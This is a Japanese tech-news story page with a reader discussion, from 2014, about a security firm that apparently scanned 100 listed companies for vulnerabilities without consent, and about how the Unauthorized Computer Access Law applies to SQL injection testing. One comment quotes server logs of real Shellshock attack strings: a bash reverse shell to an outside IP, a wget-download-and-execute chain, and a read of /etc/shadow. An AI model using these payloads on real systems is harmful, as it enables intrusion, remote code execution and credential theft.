パスワードを忘れた? アカウント作成
11676818 story
セキュリティ

とあるセキュリティ企業、上場企業100社に対し無断で攻撃を行っていた? 41

ストーリー by hylom
続報はないのだろうか 部門より
あるAnonymous Coward 曰く、

セキュリティ関連ビジネスを手がけるsproutが、上場企業100社に対し無断で攻撃を行っていたのではないかという疑惑が出ている。

発端は雑誌「FACTA」の2014年11月号掲載記事『上場企業5割に「サイバー脆弱性」』。会員限定の記事なので本文全文は閲覧できないが、sproutの公式Twitterによると、「本日発売の経済誌FACTAに、スプラウトが行った上場企業100社のサイバー脆弱性調査が掲載されました。」とのことで、sprout社が上場企業100社に対し、無断で「サイバー脆弱性調査」を行ったようだ。

しかし、脆弱性調査を行う場合、通常は調査対象の同意や事前の調整・準備が必要となる。調査を行うためには攻撃を行う必要があり、それによってデータの消失や改変などの被害が発生する可能性があるからだ(過去記事)。そのため、相手に無断で調査を行った場合、その内容によっては不正アクセス禁止法に抵触する可能性がある。

これに対し、早速セキュリティ研究家の高木浩光氏が「「危険度 高 脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか」とツッコミを入れている。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • by Anonymous Coward on 2014年10月23日 10時34分 (#2698684)

    https://twitter.com/sprout_group [twitter.com]

    インターネット・セキュリティ事件を呟きます

    だそうで。
    呟いたんですね。インターネット・セキュリティ事件を。自社だけど。マッチポンプだけど。

  • そういった方面の意識が低すぎるのかも。

    込み入った調査なんかは実際にシステムを把握したうえでやらないといけないけど
    ツールなんかで表面をさらうだけならサクっと出来ちゃうからやっちゃったのかな。

    # 既知のセキュリティーホールが残ってる程度の報告ならまだしもそうじゃないっぽいし

  • by Anonymous Coward on 2014年10月23日 12時40分 (#2698748)

    自分の所のログを出すのは気が引けるので、他所の記事ですが。

    http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]

    >c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
    >202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
    >109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]
    >83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\""
    >217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
    >125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"

    こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね?

    うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。

    情報開示請求でも出して告発した方がいいんでしょうか?

    • by Anonymous Coward

      抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。

      • by Anonymous Coward on 2014年10月23日 13時14分 (#2698782)

        不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。

        親コメント
      • by Anonymous Coward

        スキャン成功してるの?
        成功しなければ未遂なので抵触はしないですよ。
        もちろん道徳的に未遂が許されるわけではないですが。

  • by Anonymous Coward on 2014年10月23日 10時01分 (#2698672)

    御社のポリシーどうなってんの?
    と某掲示板並に容赦なく煽り入れてもらえば
    自分らがなにしたのか
    理解できるようになるんではないのかな

    # ハムラビメソッド横レス編

  • by Anonymous Coward on 2014年10月23日 11時54分 (#2698729)

    SQLインジェクションの脆弱性があるかの確認方法は、必ずしも不正アクセス禁止法違反を犯さないとできないわけではありません。不正アクセス禁止法違反を犯さない方法でアクセスして、画面の表示を見て「疑わしい」場合を見つけることができる時もあります。ただし、その方法では、あくまでも疑わしいというだけで、脆弱性があることを証明できたわけではありません。しかし、FACTA誌は、危険度高の脆弱性があると断言して特定の企業の信頼を貶めるような文体の記事を出して来ています。

    つまり次のどちらかということになるかと。

    A. 不正アクセス禁止法違反の方法で脆弱性を確実に突き止めたので、FACTA誌の記事の内容は事実として正しい。
    B. 不正アクセス禁止法違反でない方法で脆弱性が存在する可能性を大まかに推定したものなので、FACTA誌の記事は事実でない可能性のあることを事実として報じたもので、名誉毀損や信用毀損に当たるおそれがある。

    • by Anonymous Coward

      >「危険度 高 脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか

      双方が合意・締結し正規の依頼に則れば合法ですが。

      # まさか無断で合法に不正アクセスする方法を聞いてはいないよね?

      • by Anonymous Coward

        ハア?無断が前提の話でしょ?

      • by Anonymous Coward

        法律も完璧じゃないから、無断で合法な悪意のあるアクセスが出来る場合もあるよってのが元コメでしょ。まさかでもなく聞いてもいない。

    • by Anonymous Coward

      仮にその「疑わしい」程度の確認で「脆弱性」と発表するのが信じられません。
      単に脆弱性のあるバージョンのビルド番号が返ってきたからといって、そのサーバーが脆弱であるとは限らないでしょう?

      勝手に脆弱と決めつけるくせに、「疑わしい」と主観で判断したのが根拠だとしたら、それこそ大問題です。

      • by Anonymous Coward

        ちなみに、FACTAの独断とするならスプラウト某がしっかり否定しないとダメでしょう。

    • by Anonymous Coward

      ユーザー名やパスワードに引用符を入れるとPHP Warning: mysql_~とか出てきちゃうサイトが沢山あったのかも知れない。
      引用符がエスケープされてないなら、不正ログインを行うクエリも作れるでしょう。

  • by Anonymous Coward on 2014年10月23日 9時24分 (#2698654)

    暴走族あがりが白バイ乗ってるのとおなじで
    セキュリティ関連ビジネスなんてクラッカーあがりがやる仕事でしょ。

  • by Anonymous Coward on 2014年10月23日 10時06分 (#2698674)

    余計なお世話。
    ありがた迷惑。
    少なくとも「無駄なトラフィックを勝手に作った」ことを反省して欲しい。

    • by Anonymous Coward on 2014年10月23日 11時20分 (#2698703)

      ×無駄なトラフィックを勝手に作った
      ○無駄な仕事を勝手に作った

      攻撃を受けた会社は、影響調査やんなきゃなんないからね。
      攻撃の種類が不明瞭だから、あらゆる攻撃を想定して調査しなきゃならない。
      すっげぇー面倒だよ。

      親コメント
    • by Anonymous Coward

      「違法行為」は「迷惑」の大まかにサブセットだから別にいいじゃん
      迷惑の中でも特に迷惑だから違法なのさ

  • by Anonymous Coward on 2014年10月23日 10時50分 (#2698690)

    パラメータに半角のシングルクオートを含めるのは、SQLインジェクションの可能性を発見できてしまう可能性があるから、全部違法なの?

    • 不正アクセス禁止法の対象は故意犯で、過失は含まれない。

      今回の件は意図して(アタック先にSQLインジェクション脆弱性があり、それを引き起こす可能性があることを前提とした上で)アタックしているので故意。事前にアタック先と調整していないので、「業務その他正当な理由による場合」による除外対象となるかも微妙。

      …というところですかね。

      親コメント
      • by Anonymous Coward

        不正アクセス行為の禁止等に関する法律 二条四項を見る限り。
        自身の識別符号(ID)を入力した上で構文状のパスワードを入力する体裁のSQLインジェクション脆弱性検査であれば、
        法の要求する用件を満たさないため犯罪にならないような。

        • セキュリティホールへの攻撃等として不正アクセス禁止法 第2条第4項第2号が規定しているのは
          「特定利用の制限を免れることができる情報(識別符号であるものを除く。)又は指令を入力して――」
          ですね。

          この前者については、送信したデータの中に「識別符号」が含まれていたとしても、データ全体から「識別符号」やその他の攻撃に無関係な情報(通常のHTTPヘッダやPOSTデータ)を除いた部分が、「特定利用の制限を免れることができる情報」として扱われるんじゃないでしょうか。

          また、後者の「特定利用の制限を免れることができる指令」については、「識別符号であるものを除く」という規定はありませんから、「指令」の動作として必要であれば、「識別符号」も含めて「指令」とすることに問題はないでしょう。
          「指令」の動作に必要ないのであれば、前者同様に、攻撃に無関係な情報として切り分けられるように思います。

          ところで、SQLインジェクションなら、SQL構文自体が動作を規定するものだから、「指令」の方に当たるように感じます。

          親コメント
      • by Anonymous Coward

        (不正指令電磁的記録作成等)
        第百六十八条の二  正当な理由がないのに、人の電子計算機における実行の用に供する目的で、次に掲げる電磁的記録その他の記録を作成し、又は提供した者は、三年以下の懲役又は五十万円以下の罰金に処する。
        一  人が電子計算機を使用するに際してその意図に沿うべき動作をさせず、又はその意図に反する動作をさせるべき不正な指令を与える電磁的記録

        こっちはどうなんでしょう?

        • by Anonymous Coward

          そっちはウイルスを送りつけて、先方に実行させようとする場合です。
          脆弱性検査ではそういうことはしないですね。

    • by Anonymous Coward on 2014年10月23日 10時55分 (#2698691)

      子供か。常識で考えるか、きちんと法律の勉強をするか、どちらかをしろ。どちらでも答えは出るぞ。

      親コメント
      • by Anonymous Coward

        常識に反する法律なんていっぱいあるので、
        キチンと法律を勉強しないとだめなんですよね。。。

      • by Anonymous Coward

        常識が移ろいゆくものだという常識もお忘れなく

        非常識を裁くのには常識だけじゃ不足するので
        法に纏わる文は難解だったり
        世間の非常識な意味だったりするんです

        法に長けた方ほど世間知らずだったりするものなのですよ

        # 正義とは悪を収穫する営みである

    • by Anonymous Coward

      SQLの内容によっては電子計算機損壊等業務妨害罪に問われることもあるかと

      • by Anonymous Coward

        でもどうだろう。
        やる側は壊す目的はないはずで、やはり脆弱なシステムを作った側の責任も大きいと思うけどなぁ。

        ブレーキ壊れた自動車を試乗させて、事故させて、壊したから金払え、って言ってるような。
        ブレーキ壊れてるかは踏まないとわからない。

        もし自分が大切な情報を預けるサービスなら、そういうとこきっちりやってもらいたいし、事前に調べる、っていうもあってもいいのかもしれない。
        まぁ現行法ではアウトなんだろうけど、その辺もまだ法律がネットに追いついてない気がするなぁ。

    • by Anonymous Coward

      関連リンクにあるが
      パスワードリセット画面のメールアドレス欄に入力したアドレスに、誤って「+」が入っていたために全ユーザのパスワードリセットが動いたそうな。

      故意にやれば、器物損壊や威力業務妨害にあたると思われる。

      タレコミにある不正アクセス禁止法というのは、インジェクションにより、アクセス制限を回避した場合かな。

    • by Anonymous Coward

      「村田 巨人」で検索するとバグるサイトもあったりしますから、過失でも違法だったら何も出来ませんね

  • by Anonymous Coward on 2014年10月23日 11時42分 (#2698717)

    > 無断で「サイバー脆弱性調査」を行ったようだ。

    事前に許可を得たという話も聞こえてこないが、得ていないという話も聞こえてこない。

  • by Anonymous Coward on 2014年10月23日 15時18分 (#2698875)

    GETでURLについてる値やPOSTでformタグの中に書かれてるようなものなんて、クライアント側でいくらでも書き換えが可能であり、
    サーバー側はどんな値が来ても対処できるような作りにしておくべきなのは絶対的な鉄則。
    それがSQLに作用する文字列だろうがなんだろうが、受け手側の問題であり、送信者側を責めるのはおかしいと思うけどなぁ。
    もし、どうしてもサービス側が指定したものしか入力させたくないというなら、最初からサービス側が選択肢を用意して、サーバーには数値しか送れないようにしておくべきでは。文字列も全て選択肢にするか、「あ」を1、「い」を2みたいにするとか。

    それが嫌ならもうQUERY STRING書き換えも違法、とでもすればいいよ。

    通常のアクセスだろうが調査目的のアクセスだろうが、無駄に大量アクセスして過大な負荷をかけるのは別の話(違法でいい)。

    • FACTAのログインフォームが、どうも俺達を試しているような気がするんだ。

      き、君が、た、試してみてくれ。

    • by Anonymous Coward

      呼び鈴がついてるからってピンポンダッシュしてもいいってもんじゃないでしょ。

typodupeerror

ソースを見ろ -- ある4桁UID

読み込み中...